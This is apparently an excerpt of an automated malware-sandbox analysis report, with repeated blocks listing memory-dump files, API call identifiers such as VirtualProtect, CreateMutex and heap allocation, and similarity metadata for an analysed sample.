                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3418686817-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6FE0AAB79,?,?,?,00007FF6FE09AF01,?,?,?,?,00007FF6FE0B02A3), ref: 00007FF6FE0A9271
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
• Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
• Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
• Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateMutex
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1964310414-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF6FE02AF20,?,?,?,?,00007FF6FE02AABE), ref: 00007FF6FE02AE07
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
• Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
• Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.1550983440.00007FF6FDFD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6FDFD0000, based on PE: true
• Associated: 00000012.00000002.1550972781.00007FF6FDFD0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551048554.00007FF6FE0C1000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551066912.00007FF6FE0DF000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551077867.00007FF6FE0E0000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551088454.00007FF6FE0E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.1551099491.00007FF6FE0E5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_7ff6fdfd0000_NzEz.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%